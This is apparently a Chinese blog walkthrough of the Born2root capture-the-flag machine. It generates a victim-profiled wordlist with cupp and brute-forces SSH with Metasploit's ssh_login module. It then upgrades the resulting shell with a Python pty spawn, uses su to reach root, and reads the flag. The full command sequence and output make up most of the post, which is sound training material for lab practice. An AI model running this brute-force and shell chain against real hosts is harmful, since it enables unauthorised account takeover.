**
一、破解前的准备
**
下载密码文件
root@kali:~# git clone https://github.com/jeanphorn/common-password.git
创建字典文件
root@kali:~# cd common-password/
root@kali:~/common-password# ls
cupp.cfg cupp.py docs README.md
root@kali:~/common-password# chmod 777 cupp.
chmod: 无法访问'cupp.': 没有那个文件或目录
root@kali:~/common-password# chmod 777 cupp.py
root@kali:~/common-password# ./cupp.py -i
[+] Insert the informations about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> Name: hadi
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
> Wife's(husband's) name:
> Wife's(husband's) nickname:
> Wife's(husband's) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]y
> Leet mode? (i.e. leet = 1337) Y/[N]: n
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to hadi.txt, counting 372 words.
[+] Now load your pistolero with hadi.txt and shoot! Good luck!
**
二、使用metasploit
**
root@kali:~/common-password# msfconsole //登陆metasploit控制台
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use auxiliary/scanner/ssh/ssh_login //使用模板
msf auxiliary(ssh_login) > show options//显示参数
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set rhosts 192.168.1.109//设置主机地址
rhosts => 192.168.1.109
msf auxiliary(ssh_login) > set username hadi//设置用户名
username => hadi
msf auxiliary(ssh_login) > set pass_file '/root/common-password/hadi.txt'//设置字典
pass_file => /root/common-password/hadi.txt
msf auxiliary(ssh_login) > set threads 5//设置线程
threads => 5
msf auxiliary(ssh_login) > show options//查看 选项是否完成
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/common-password/hadi.txt no File containing passwords, one per line
RHOSTS 192.168.1.109 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME hadi no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > run //开始爆破
[*] SSH - Starting bruteforce
[-] SSH - Failed: 'hadi:Hadi10'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'hadi:Hadi11'
[-] SSH - Failed: 'hadi:Hadi12'
[-] SSH - Failed: 'hadi:Hadi13'
[-] SSH - Failed: 'hadi:Hadi14'
[-] SSH - Failed: 'hadi:Hadi15'
[-] SSH - Failed: 'hadi:Hadi16'
[-] SSH - Failed: 'hadi:Hadi17'
[-] SSH - Failed: 'hadi:Hadi18'
[-] SSH - Failed: 'hadi:Hadi19'
[-] SSH - Failed: 'hadi:Hadi20'
[-] SSH - Failed: 'hadi:Hadi2008'
[-] SSH - Failed: 'hadi:Hadi2009'
[-] SSH - Failed: 'hadi:Hadi2010'
[-] SSH - Failed: 'hadi:Hadi21'
[-] SSH - Failed: 'hadi:Hadi22'
[-] SSH - Failed: 'hadi:Hadi23'
[-] SSH - Failed: 'hadi:Hadi24'
[-] SSH - Failed: 'hadi:Hadi25'
[-] SSH - Failed: 'hadi:Hadi26'
[-] SSH - Failed: 'hadi:Hadi27'
[-] SSH - Failed: 'hadi:Hadi28'
[-] SSH - Failed: 'hadi:Hadi29'
[-] SSH - Failed: 'hadi:Hadi30'
[-] SSH - Failed: 'hadi:Hadi31'
[-] SSH - Failed: 'hadi:Hadi32'
[-] SSH - Failed: 'hadi:Hadi33'
[-] SSH - Failed: 'hadi:Hadi34'
[-] SSH - Failed: 'hadi:Hadi35'
[-] SSH - Failed: 'hadi:Hadi36'
[-] SSH - Failed: 'hadi:Hadi37'
[-] SSH - Failed: 'hadi:Hadi38'
[-] SSH - Failed: 'hadi:Hadi39'
[-] SSH - Failed: 'hadi:Hadi40'
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/common-password/hadi.txt no File containing passwords, one per line
RHOSTS 192.168.1.109 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME hadi no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
root@kali:~/common-password# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > show auxiliary/scanner/ssh/ssh_login
[-] Invalid parameter "auxiliary/scanner/ssh/ssh_login", use "show -h" for more information
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set rhosts 192.168.1.109
rhosts => 192.168.1.109
msf auxiliary(ssh_login) > set password hadi123
password => haid123
msf auxiliary(ssh_login) > set username hadi
username => hadi
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[-] SSH - Failed: 'hadi:haid123'
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set password hadi123
password => hadi123
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[+] SSH - Success: 'hadi:hadi123' 'uid=1000(hadi) gid=1000(hadi) groupes=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) Linux debian 3.16.0-4-586 #1 Debian 3.16.39-1+deb8u2 (2017-03-07) i686 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.1.108:43539 -> 192.168.1.109:22) at 2019-07-07 13:35:32 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions
Actisve sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell linux SSH hadi:hadi123 (192.168.1.109:22) 192.168.1.108:43539 -> 192.168.1.109:22 (192.168.1.109)
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...
ls
buff
buff.c
example.c
overflow
peda-session-buff.txt
peda-session-overflow.txt
pwd
/home/hadi
python -c "import pty;pty.spawn('/bin/bash')"//使用python脚本命令优化行界面
hadi@debian:~$ su -root
su -root
su : option invalide -- 'r'
Syntaxe : su [options] [IDENTIFIANT]
Options :
-c, --command COMMANDE passer la commande COMMANDE à
l'interpréteur de commande appelé ;
-h, --help afficher ce message d'aide et quitter ;
-, -l, --login utiliser un interpréteur de commandes
initial (« login shell ») ;
-m, -p,
--preserve-environment ne pas réinitialiser les variables
d'environnement et conserver le même
interpréteur de commandes ;
-s, --shell SHELL utiliser SHELL comme interpréteur de
commandes à la place de celui défini
par défaut dans le fichier passwd.
hadi@debian:~$ sudo -root
sudo -root
bash: sudo : commande introuvable
hadi@debian:~$ su - root
su - root
Mot de passe : hadi123
root@debian:~# pwd
pwd
/root
root@debian:~# ls
ls
flag.txt
root@debian:~# cat flag.txt
cat flag.txt
,-----. ,---. ,------. ,--.
| |) /_ ,---. ,--.--.,--,--, '.-. \| .--. ' ,---. ,---. ,-' '-.
| .-. \| .-. || .--'| \ .-' .'| '--'.'| .-. || .-. |'-. .-'
| '--' /' '-' '| | | || |/ '-.| |\ \ ' '-' '' '-' ' | |
`------' `---' `--' `--''--''-----'`--' '--' `---' `---' `--'
Congratulations ! you pwned completly Born2root's CTF .
I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p
I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...
Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !
Enumeration is The Key .
Give me feedback :[FB] Hadi Mene
root@debian:~#
破解中用到的命令:
git clone 地址 //下载对应字典
./copy.py -i //执行文件
-i 参数,运行完python脚本文件以后打开一个python环境,方便查看运行结果
use auxiliary/scanner/ssh/ssh_login //ssh暴力破解模块
set 设置选项 show options 显示选项 back返回 exit 退出 run运行
python -c "import pty;pty.spawn('/bin/bash')"
pty模块定义了处理伪终端概念的操作:启动另一个进程并能够以编程方式写入和读取其控制终端。
spawn指pty模块的生成一个进程,并将其控制终端连接至当前进程标准IO;
-c 参数,直接运行python语句。
1519
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
